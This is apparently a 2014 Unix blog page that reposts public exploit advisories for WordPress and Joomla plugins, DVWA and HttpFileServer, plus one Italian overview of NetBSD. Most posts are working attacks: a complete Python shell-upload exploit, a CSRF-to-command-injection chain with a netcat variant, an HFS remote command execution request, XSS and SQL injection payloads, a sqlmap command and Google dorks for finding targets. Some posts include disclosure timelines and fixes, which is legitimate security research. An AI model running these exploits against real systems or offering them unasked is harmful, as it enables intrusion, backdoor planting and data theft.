MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

18Sep/140

WordPress WP-Ban 1.62 Bypass

Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)
 
Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations
 
Vulnerability
================
This plugin allows blacklisting users based on their IP address, however it takes the IP address from the X-Forwarded-For header if available.
Not all Web server configurations will strip or replace X-Forwarded-For headers – in which case the IP ban can be bypassed by sending this header. This plugin therefore only works in certain configurations, but does not warn admins of this fact.
 
Proof of concept
================
 
Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set “Banned IPs” to “127.0.0.1″
Execute “curl http://localhost/\" and see the “You Are Banned” message
Execute “curl http://localhost/ -H \'X-Forwarded-For: 999.999.999.999\'\" and see that it displays the page
 
Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: “delete from wp_options where option_name=\'banned_ips\';\")
 
Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

(15)

16Sep/140

DVWA Cross Site Request Forgery

<!-- There are multiple CSRF issues in DVWA. Attackers can use these CSRF exploits to
  first reset the DVWA database of victim, then make the victim log in using the default resets,
  next crafts another CSRF to change the challenge level to low to make exploitation more probable,
  then use these to craft a command execution CSRF and possibly get a shell. :) 
 
  *This PoC will open calculator as a demo execution in approximately 5 seconds.*
 
  The attacker just needs to know you have DVWA for this to work.
 
  Paulos Yibelo and Tabor N. Shiferaw  2014
 
  -->
 
  <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
  </script>
  <div id='loader'></div>
 
  <Script>
 
  //document.getElementById("loader").innerHTML = 'Loading...';
 
  var one = {"create_db":'whatever'};
  var two = {"username":"admin","password":"password","Login":"Login"};
  var three = {"security":"low","seclev_submit":"Submit"};
 
  //windows opens calculator; change this to whatever your desire 
  var four = {"ip":"127.0.0.1 && notepad && calc","submit":"submit"};
 
  //linux
  //var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
 
  /*
  *step 1
  *Reset the Databse
  */
  function start_exploit()
  {
    $("#loader").html("Loading...");
    $.ajax({
      url:"http://localhost/dvwa/setup.php",
      type:"POST",
      data:one,
      success:
          function(x){
            dvwaLogin();
          }
 
    });
  }
  /*
  *step 2
  *login using default new password 
  */
  function dvwaLogin()
  {
    $.ajax({
      url:"http://localhost/dvwa/login.php",
      type:"POST",
      data:two,
      success:function(x){
        levelChanger();
      }
    });
  }
  /*
  *step 3
  *set level to low
  */
  function levelChanger(){
    $.ajax({
      url:"http://localhost/dvwa/security.php",
      type:"POST",
      data:three,
      success:function(x){
        commandExecution();
      }
    });
  }
 
  /*
  *step 4
  *execute command
  */
  function commandExecution(){
    $.ajax(
        {
          url:"http://localhost/dvwa/vulnerabilities/exec/index.php",
          type:"POST",
          data:four,
          success:function(x){
            //document.getElementById("loader").innerHTML = "Executed";
            $("#loader").text("Loaded");
          }
        }
      );
  }
 
 
  start_exploit();
  </script>
 
<!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->

(47)

16Sep/140

HttpFileServer 2.3.x Remote Command Execution

ffected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
 
issue exists due to a poor regex in the file ParserLib.pas
 
 
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
 
 
it will not handle null byte so a request to
 
http://localhost:80/search=%00{.exec|cmd.}
 
will stop regex from parse macro , and macro will be executed and remote code injection happen.

(23)

16Sep/140

WordPress Slideshow Gallery 1.4.6 Shell Upload

#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management slide
# 2) python's httplib2 lib
#    Installation: pip install httplib2
#
# Usage:
#
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php
#
# Backdoor Location:
#
# http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php
#
# Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0
#
 
# http connection
import urllib, httplib2, sys, mimetypes
# Args management
import optparse
# Error management
import socket, httplib, sys
# file management
import os, os.path
 
# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 
# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
 
# Create multipart header
def create_body_sh3ll_upl04d(payloadname):
 
   getfields = dict()
   getfields['Slide[id]'] = ''
   getfields['Slide[order]'] = ''
   getfields['Slide[title]'] = 'h0m3l4b1t'
   getfields['Slide[description]'] = 'h0m3l4b1t'
   getfields['Slide[showinfo]'] = 'both'
   getfields['Slide[iopacity]'] = '70'
   getfields['Slide[type]'] = 'file'
   getfields['Slide[image_url]'] = ''
   getfields['Slide[uselink]'] = 'N'
   getfields['Slide[link]'] = ''
   getfields['Slide[linktarget]'] = 'self'
   getfields['Slide[title]'] = 'h0m3l4b1t'
 
   payloadcontent = open(payloadname).read()
 
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'
 
   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)
 
   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body
 
banner = """
 
 $$$$$$\  $$\ $$\       $$\                     $$\
$$  __$$\ $$ |\__|      $$ |                    $$ |
$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\
\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ |
 \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |
$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |
\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  |
 \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/
 
 
 
             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\
            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\
            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|
            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\
            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\
            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |
            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |
             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/
                                                            $$\   $$ |
                                                            \$$$$$$  |
                                                             \______/
 
                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
 
                          =============================================
                          - Release date: 2014-08-28
                          - Discovered by: Jesus Ramirez Pichardo
                          - CVE: 2014-5460
                          =============================================
 
                                          Written by:
 
                                        Claudio Viviani
 
                                     http://www.homelab.it
 
                                        info@homelab.it
                                     homelabit@protonmail.ch
 
                                https://www.facebook.com/homelabit
                                https://twitter.com/homelabit
                                https://plus.google.com/+HomelabIt1/
                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
 
commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('-u', '--user', action="store",
                  help="Insert Username",
                  )
commandList.add_option('-p', '--password', action="store",
                  help="Insert Password",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )
 
options, remainder = commandList.parse_args()
 
# Check args
if not options.target or not options.user or not options.password or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 
payloadname = checkfile(options.file)
host = checkurl(options.target)
username = options.user
pwd = options.password
timeout = options.timeout
 
print(banner)
 
url_login_wp = host+'/wp-login.php'
url_admin_slideshow = host+'/wp-admin/admin.php?page=slideshow-slides&method=save'
 
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
 
http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)
 
# Wordpress login POST Data
body = { 'log':username,
         'pwd':pwd,
         'wp-submit':'Login',
         'testcookie':'1' }
# Wordpress login headers with Cookie
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
            'Content-type': 'application/x-www-form-urlencoded',
            'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
try:
    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))
    if len(response['set-cookie'].split(" ")) < 4:
    #if 'httponly' in response['set-cookie'].split(" ")[-1]:
        print '[X] Wrong username or password'
        sys.exit()
    else:
        print '[+] Username & password ACCEPTED!\n'
 
        # Create cookie for admin panel
        if 'secure' in response['set-cookie']:
            c00k13 = response['set-cookie'].split(" ")[6]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[10]
        else:
            c00k13 = response['set-cookie'].split(" ")[5]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[8]
 
        bodyupload = create_body_sh3ll_upl04d(payloadname)
 
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                   'Cookie': c00k13,
                   'content-type': content_type,
                   'content-length': str(len(bodyupload)) }
        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)
 
        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:
            print '[!] Shell Uploaded!'
            print '[+] Check url: '+host+'/wp-content/uploads/slideshow-gallery/'+payloadname.lower()+' (lowercase!!!!)'
        else:
            print '[X] The user can not upload files or plugin fixed :((('
 
except socket.timeout:
    print('[X] Connection Timeout')
    sys.exit(1)
except socket.error:
    print('[X] Connection Refused')
    sys.exit(1)
except httplib.ResponseNotReady:
    print('[X] Server Not Responding')
    sys.exit(1)
except httplib2.ServerNotFoundError:
    print('[X] Server Not Found')
    sys.exit(1)
except httplib2.HttpLib2Error:
    print('[X] Connection Error!!')
    sys.exit(1)

(22)

15Sep/140

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a--><script>alert(1)</script>0aa96
Accept-Encoding: gzip, deflate
Host: <vulnerablesite.example>
DNT: 1
Proxy-Connection: Keep-Alive
Pragma: no-cache
 
Issue number 2: A Cross-site Scripting (reflective)vulnerability.
 
Details:
The value of the wppa-album parameter is inserted into a java script string. A supplied payload in the wppa-album parameter is echoed back unmodified to the client browser.
 
Severity: High
 
Proof of Concept (POC):
http://vulnerablesite.example/?page_id=109&wppa- album=0178d4<%2fscript><script>alert(1)<%2fscript>75f6e&wppa-cover=0&wppa- occur=1&wppa-tag=
 
Issue number 3: Cross-Site Scripting (Reflective) Vulnerability. 
 
Severity: High
 
Details:
The supplied value of the request parameter wppa-lasten is vulnerable to cross-site scripting. By using an event handler such as “onmouseover” it is possible to insert arbitrary JavaScript into the page.
 
Proof of concept (POC):
http://vulnerablesite.example/?wppa-occur=1&wppa- lasten=102dbdd"%20onmouseover%3dalert(1)%20fd679&page_id=10&wppa- album=0&wppa-photo=2
 
Issue number 4: Cross-Site Scripting (Refective) vulnerability 
 
Severity: High
 
Details:
The value supplied to the wppa-searchstring parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response.
 
Proof of Concept (POC): http://vulnerablesite.example/?page_id=110&wppa-search-submit=wppa-search- submit%3dSearch&wppa- searchstring=cd84d"style%3d"behavior%3aurl(%23default%23time2)"onbegin%3d"alert (1)"3b512b44ea8&wppa-searchroot=
 
Issue number 5: Cross-Site Scripting (reflective) 
 
Severity: High
 
Details:
This is similar to issue three. The value supplied to the wppa-topten parameter is inserted into the value of a HTML tag attribute. By using an event handler such as “onmouseover” it is possible to inject arbitrary JavaScript into the page.
 
Proof of Concept:
http://vulnerablesite.example/?wppa-occur=1&wppa- topten=10eb700"%20onmouseover%3dalert(1)%203c53f&&page_id=12&wppa- album=0&wppa-photo=2
 
Issue: Cross-Site Scripting (Reflective) Vulnerability.
 
Severity: High
 
Detail:
This is similar to issue number four. The value supplied to the s (search) parameter is copied into the value of a HTML tag attribute. It is possible to use a style attribute to introduce arbitrary JavaScript in the applications response. The plugin seems to use the value of s (search) for the same value of wppa-searchstring.
 
Proof of Concept: http://vulnerablesite.example/?s=7d0ba"style%3d"behavior%3aurl(%23default%23time2 )"onbegin%3d"alert(1)"3924b
 
Resolution: 
Developer fixed the issues immediately after disclosure. Update the plugin to the latest version.

(115)

15Sep/140

Joomla Spider Form Maker 4.3 SQL Injection

######################
 
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://web-dorado.com/products/joomla-form.html
 
# Dork Google: inurl:com_formmaker
 
 
# Date : 2014-09-07
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
######################
 
# PoC Exploit:
 
http://localhost/index.php?option=com_formmaker&view=formmaker&id=[SQLi]
 
 
"id" variable is not sanitized.
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-09-07:  Discovered vulnerability
2014-09-09:  Vendor Notification
2014-09-10:  Vendor Response/Feedback
2014-09-10:  Vendor Fix/Patch
2014-09-10:  Public Disclosure
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(29)

10Sep/140

NetBSD

netbsd

NetBSD è un sistema operativo Unix-like derivato da BSD UNIX altamente portabile, gratuito, disponibile per molte piattaforme, dai server alpha a 64 bit fino ai dispositivi palmari.
Il suo design pulito e le sue caratteristiche avanzate lo rendono idoneo a ambiti sia produttivi sia di ricerca. È completamente disponibile in forma sorgente ed ha una ricca dotazione di applicazioni.

Le origini di NetBSD

La prima versione di NetBSD (0.8) risale all'agosto del 1993 e deriva dal sistema operativo 4.3BSD NET/2, una versione di Unix sviluppata all'Università della California di Berkeley BSD (Berkeley Software Distribution) e dal sistema 386BSD, il primo port per sistemi Intel 386. In seguito sono state integrate le modifiche provenienti dal sistema 4.4BSD Lite, l'ultima distribuzione ufficiale del gruppo di sviluppatori di Berkeley prima dello scioglimento. Il ramo BSD di Unix ha avuto una grande importanza nella storia di questo sistema operativo, al quale ha contribuito con svariate innovazioni che oggi fanno parte di tutti i sistemi Unix (l'editor vi, la C shell, il job control, il Berkeley fast file system, l'integrazione del TCP/IP, tanto per menzionarne alcune). Questa tradizione di sviluppo e di ricerca sopravvive oggi nei sistemi BSD (sia gratuiti sia commerciali) e, in particolare, in NetBSD.

Caratteristiche di NetBSD

NetBSD funziona su una vasta gamma di piattaforme hardware ed è molto portabile. Con NetBSD viene fornito il codice sorgente dell'intero sistema operativo per tutte le piattaforme supportate. Senza dilungarsi in eccessivi dettagli, per i quali si rimanda senz'altro al sito ufficiale del progetto NetBSD, le caratteristiche fondamentali di questo sistema operativo sono le seguenti

Estrema portabilità (oltre 50 piattaforme supportate)
Qualità e correttezza del codice
Aderenza agli standard
Ricerca e innovazione

Le caratteristiche appena menzionate portano dei vantaggi anche indiretti. Per esempio, chi lavora su una piattaforma sola potrebbe non essere interessato alla portabilità; in realtà, però, la portabilità è strettamente legata alla qualità del codice: non sarebbe possibile supportare tutte queste piattaforme se il codice non fosse ben scritto e ben organizzato. L'attenzione verso l'aspetto architetturale e qualitativo del sistema viene ripagata con le grandi potenzialità del suo codice e la qualità dei suoi driver e quindi interessa tutti gli utenti.

Una delle caratteristiche del sistema è quella di non accontentarsi di implementazioni parziali: "se deve essere fatto, deve essere fatto bene"; il panorama informatico già tristemente abbonda di esempi di programmi e sistemi operativi ipersviluppati e pieni di errori che collassano sotto il proprio stesso peso.

A chi si rivolge NetBSD

Secondo quanto compare sul sito di NetBSD, i suoi destinatari sono i professionisti, gli appassionati e i ricercatori che vogliono un sistema stabile che privilegi la qualità. Ma anche chi vuole imparare a usare Unix troverà in NetBSD la piattaforma ideale, soprattutto per la sua aderenza agli standard (uno degli scopi del progetto) e, infine, chi ha bisogno di una piattaforma Unix disponibile su una grande varietà di macchine, non può trovare migliore alleato di NetBSD.

Un'altra caratteristica interessante di NetBSD è la possibilità di riutilizzare sistemi hardware considerati obsoleti per la maggior parte dei sistemi operativi: questo ne fa un'ottima piattaforma per apprendere Unix. Come dire "non c'è bisogno di comprare nuovo hardware per avere la vostra versione di Unix in funzione: potete tranquillamente riutilizzare il vecchio MacIIcx che avete in soffitta".

Fonte : http://it.wikipedia.org/wiki/NetBSD

(104)

10Sep/140

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel () Night

(106)

9Sep/140

WordPress Spider Facebook 1.0.8 SQL Injection

######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
        if(!function_exists ('print_html_nav' ))
        require_once("nav_function/nav_html_func.php");
        global $wpdb;
        if(isset($_GET['id']))
        {
        $id=$_GET['id'];
        }
        else
        {
                $id=0;
        }
 
 
######################
 
# PoC Exploit:
 
http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2
 
 
# Exploit Code via sqlmap:
 
sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://10.0.0.67/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1" -p id --dbms=mysql
 
[21:27:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
...
...
...
---
Place: GET
Parameter: id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 AND SLEEP(5)
 
---
 
 
# PoC Video:
 
https://www.youtube.com/watch?v=CcuvHLWnjZo
 
######################
 
# Vulnerability Disclosure Timeline:
 
2014-08-25:  Discovered vulnerability
2014-09-04:  Vendor Notification (Web Customers Service Form)
2014-08-05:  Vendor Response/Feedback 
2014-08-05:  Vendor Fix/Patch 
2014-08-05:  Public Disclosure
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################

(273)